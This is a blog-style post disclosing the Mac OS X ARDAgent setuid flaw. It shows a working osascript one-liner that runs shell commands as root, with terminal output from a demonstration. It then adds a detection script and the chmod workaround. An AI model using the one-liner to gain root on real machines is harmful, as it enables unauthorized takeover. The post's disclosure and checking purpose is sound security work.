Super-simple local privilege escalation exploit on Mac OS X

Big ouch for Apple today..

One of the nice things about Mac OS X is that it asks you to authenticate with your password whenever a program is about to run something as the superuser (root) -- similar in spirit to Vista's UAC, but arguably more seamless. That prompt is what stands between a malicious program running as your ordinary user account and full control of the machine.

However, a hole was discovered in ARDAgent, the Apple Remote Desktop agent that ships with Mac OS X, which circumvents that prompt entirely. The ARDAgent binary is installed set-user-ID root, and its AppleScript dictionary exposes a "do shell script" command, so any local user can send it an AppleScript event asking it to run an arbitrary shell command, and the command runs as root:

$ uname -a
Darwin mymac.local 9.3.0 Darwin Kernel Version 9.3.0: Fri May 23 00:49:16 PDT 2008; root:xnu-1228.5.18~1/RELEASE_I386 i386 i386
$ whoami
jsmith
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root

Interpretation for those who are not as familiar with shell commands: that osascript command sent an AppleScript event to ARDAgent asking it to run the whoami program, and ARDAgent did so as superuser -- no password or other hurdle required. Obviously "whoami" can be replaced with something far more nefarious.

Here's a very simple example. The Mac has a /var/root/ directory that's owned by root and is not accessible by regular users:

$ ls -l /var/root/
ls: : Permission denied

Let's take a peek into it..

$ sudo -s
bash-3.2# ls -l /var/root/
total 16
-rw-r--r-- 1 root wheel 3 Nov 30 2007 .CFUserTextEncoding
-r--r--r-- 1 root wheel 10 Sep 23 2007 .forward
drwx------ 3 root wheel 102 Dec 1 2007 .ssh
drwx------ 7 root wheel 238 Nov 30 2007 Library
bash-3.2# exit
$

Now, back as a regular user, we run this...

$ osascript -e 'tell app "ARDAgent" to do shell script "echo abc >/var/root/testfile"';

...which creates the testfile in /var/root

$ sudo -s
bash-3.2# ls -l /var/root/
total 24
-rw-r--r-- 1 root wheel 3 Nov 30 2007 .CFUserTextEncoding
-r--r--r-- 1 root wheel 10 Sep 23 2007 .forward
drwx------ 3 root wheel 102 Dec 1 2007 .ssh
drwx------ 7 root wheel 238 Nov 30 2007 Library
-rw-rw-rw- 1 root wheel 4 Jun 19 18:21 testfile
bash-3.2# cat /var/root/testfile
abc

Again, no password required. Also note the mode of the new file, -rw-rw-rw-: it was created world-writable, so the shell that ARDAgent spawned was running with an empty umask on top of root privileges.

This only works locally (the attacker needs code running under some user account on the Mac) but it is still Not A Good Thing: any program a user runs, including one delivered through a browser or a trojaned download, can silently become root with a single line of AppleScript. A virus or worm could use this vulnerability to gain a foothold on the system and spread.

So how do you fix it? See Matasano's post on this bug for suggestions.
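The following script is an added example, not code from the original post or from Apple or Matasano. It checks a machine for the bug in two independent ways: the precondition (the ARDAgent binary carries the set-user-ID bit) and the actual behaviour (the same osascript invocation as above, but asking for the numeric uid instead of whoami). The ARDAgent path is the stock Mac OS X location and is an assumption that can be overridden through the ARDAGENT_BIN variable; the script name is hypothetical.

```shell
#!/bin/sh
# ardagent-check.sh (added example, not from the original post)
# Reports whether a Mac is exposed to the ARDAgent "do shell script" escalation.
# The path below is assumed to be the stock Mac OS X location; override with ARDAGENT_BIN.
ARDAGENT_BIN="${ARDAGENT_BIN:-/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent}"

# Precondition check: does the file given as $1 carry the set-user-ID bit?
# Uses the POSIX "test -u" operator so it works in any sh.
is_setuid() {
    [ -u "$1" ]
}

# Turn the uid string returned by a probe into a verdict:
#   vulnerable : the probe ran as uid 0
#   not-root   : the probe ran, but as an unprivileged uid
#   no-result  : nothing came back (ARDAgent absent, osascript failed, ...)
# Kept separate from the probe so the decision logic can be exercised
# on a machine that has no ARDAgent at all.
classify_uid() {
    case "$1" in
        0)  echo vulnerable ;;
        '') echo no-result ;;
        *)  echo not-root ;;
    esac
}

# Behavioural probe: the osascript line from the post, but running "id -u"
# so the answer is a number rather than a user name. Prints the verdict.
probe_ardagent() {
    uid=$(osascript -e 'tell app "ARDAgent" to do shell script "id -u"' 2>/dev/null | tr -d '[:space:]')
    classify_uid "$uid"
}

main() {
    if is_setuid "$ARDAGENT_BIN"; then
        echo "precondition: $ARDAGENT_BIN is setuid"
    else
        echo "precondition: $ARDAGENT_BIN is not setuid (or not present)"
    fi
    case "$(probe_ardagent)" in
        vulnerable) echo "result: VULNERABLE - 'do shell script' via ARDAgent runs as root" ;;
        not-root)   echo "result: command ran through ARDAgent, but not as root" ;;
        no-result)  echo "result: inconclusive - ARDAgent/osascript did not answer" ;;
    esac
}

main
```

Run it as a regular user, not under sudo, or the probe proves nothing. On a vulnerable 10.5.x machine both lines come back positive; after the commonly cited workaround of stripping the setuid bit from the ARDAgent binary (sudo chmod u-s on the path above) the precondition line changes and the probe no longer reports uid 0. Expect that workaround to break Apple Remote Desktop management of the machine until the bit is restored, which is the usual trade-off with this kind of fix.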
